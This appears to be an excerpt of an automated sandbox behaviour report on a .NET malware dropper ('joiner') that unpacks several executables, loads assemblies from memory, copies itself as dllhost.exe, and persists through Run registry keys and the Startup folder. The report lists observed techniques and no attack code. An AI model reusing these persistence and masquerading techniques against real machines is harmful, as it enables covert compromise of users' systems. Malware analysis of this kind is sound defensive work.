Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: shfolder.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\virus.exe.bin.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: virus.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: virus.exe.bin.exe Static file information: File size 6809900 > 1048576
Source: C:\Users\user\Desktop\virus.exe.bin.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll
Source: virus.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: virus.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 Corporation1)0' source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Daniel\source\repos\joinerStub\obj\Release\joinerStub.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Daniel\program.pdb source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: virus.exe.bin.exe, Module1.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: Hyra.exe.0.dr, Module1.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: final.exe.2.dr, Module1.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: Payload.exe.11.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 11.2.final.exe.3758448.0.raw.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: virus.exe.bin.exe Static PE information: 0xE2E5C912 [Fri Aug 18 03:27:14 2090 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF8876B20FA pushad ; retf 9_2_00007FF8876B23F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF88778343D pushfd ; iretd 9_2_00007FF88778343E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_15389F48 push eax; retf 12_3_15389F49
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_15387F97 push A0153CC1h; ret 12_3_15387FA1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_15389F80 pushad ; iretd 12_3_15389F81
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D070 push 685018C3h; ret 12_3_1537D076
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D67C pushad ; ret 12_3_1537D67D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D678 pushad ; ret 12_3_1537D679
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D078 push 685018C3h; ret 12_3_1537D07E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D090 push 2AE018C3h; ret 12_3_1537D096
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D684 pushad ; ret 12_3_1537D685
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D680 pushad ; ret 12_3_1537D681
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D080 push 685018C3h; ret 12_3_1537D086
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D088 push 685018C3h; ret 12_3_1537D08E
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_1537D0E9 push 685018C3h; ret 12_3_1537D076
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_3_153BC312 pushad ; ret 12_3_153BC319
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_023C8A11 push cs; retf 12_2_023C8A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_023D083C push ds; retn 0000h 12_2_023D08A6
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_023CDD1D push es; retn 0029h 12_2_023CDD53
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232D8F7 push 00000000h; mov dword ptr [esp], esp 12_2_0232D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232A21B push ecx; ret 12_2_0232A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232A20A push ecx; ret 12_2_0232A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232BB67 push 00000000h; mov dword ptr [esp], esp 12_2_0232BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232B3B7 push 00000000h; mov dword ptr [esp], esp 12_2_0232B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232D8E0 push 00000000h; mov dword ptr [esp], esp 12_2_0232D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232B947 push 00000000h; mov dword ptr [esp], esp 12_2_0232B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 12_2_0232C477 push 00000000h; mov dword ptr [esp], esp 12_2_0232C49D
Source: C:\Users\user\AppData\Roaming\dllhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe File created: C:\ClickMe.exe
Source: C:\Users\user\Desktop\virus.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\dllhost.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe
Source: C:\Users\user\AppData\Roaming\dllhost.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\c382eb151c59bd833b24120723eac541 f55ab6fb12b43f7934c631eabc315fb4
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\Desktop\virus.exe.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
